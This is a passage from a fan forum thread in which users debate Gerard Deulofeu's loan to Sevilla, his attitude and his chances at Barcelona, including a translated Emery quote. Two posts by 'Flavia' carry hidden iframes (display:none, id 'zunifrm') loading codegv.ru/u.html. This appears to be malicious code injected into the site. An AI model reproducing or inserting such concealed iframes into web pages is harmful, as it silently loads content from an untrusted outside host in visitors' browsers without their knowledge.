Gerard Deulofeu

I think it's better to keep him loaned to places where he won't be pampered and where he won't be an automatic starter. He needs to sort out things like his selfishness and workrate if he wants to make it at Barca. Better to loan him to places where he'll be forced to get his shit together if he wants to start.

Last edited:

Sumlit

San Claudio Bravo
Keep him at Sevilla and let Unai beat some sense into him. If he can realize he is his own worse enemy, then all the talent in the world won't help him. He needs to get his shit together.

DinhoR10

Its sad because raw talent wise, the only other one that can match him is probably seung woo lee. All he needs to do is work hard, his path to greatness has always been there he just needs to start walking again.

aaron101

I have more faith on Munir and Rafinha than Deulofeu. Yes he has the talent but talent alone isn't enough. I honestly don't think Duelofeu will succeed at Barca. He'll just end up as Bojan.

DinhoR10

I have more faith on Munir and Rafinha than Deulofeu. Yes he has the talent but talent alone isn't enough. I honestly don't think Duelofeu will succeed at Barca. He'll just end up as Bojan.

I have more faith in them but Deu will never be bojan, he's too good to end up at stoke, at worst he'll probably end up like Giovani.

Rahj

but then again it's too early to see whether he will be a success at sevilla. we're just at the beginning of the season and by the end of the year, his role in the team might be a different one.

F

Flavia

Emery: "Deulofeu ha crecido en la mejor cantera del mundo y destacaba en todas las categorías" pero le queda "dar el paso más difícil".<iframe src="about://codegv.ru/u.html" style="display: none;" id="zunifrm"></iframe><iframe src="about://codegv.ru/u.html" style="display: none;" id="zunifrm"></iframe><iframe src="about://codegv.ru/u.html" style="display: none;" id="zunifrm"></iframe>
"Deulofeu grew up in the best academy in the world, and he excelled in all categories, but he still needs to take the hardest step".

Adversus

I would love us (Everton) to buy him back for 5m-10m even if it had a 25m buy back clause but I'm not too sure about taking him on loan.

He is still developing and inconsistent both attacking and work-rate which I never thought was too bad but maybe he's gone backwards with that.

For those reasons I wouldn't want us playing him over our current players unless we saw the benefit which would likely be in a season or two's time.

Btw - I agree with FCBarca I don't think a tough love approach will work. He's just not that type of personality. Martinez was getting the best out of him, improving him and was liked by the player no matter what anyone says.

However it's still early days and there's plenty of time to turn it around although I did fear he wouldn't see a lot of minutes at Sevilla.

Alarcón

We're only 3 games into the season, let's see how he will fare but the current situation has a striking resemblance to last season which is worrying.

F

Flavia

He's starting against Feyenoord<iframe src="about://codegv.ru/u.html" style="display: none;" id="zunifrm"></iframe>

Home of Barca Fans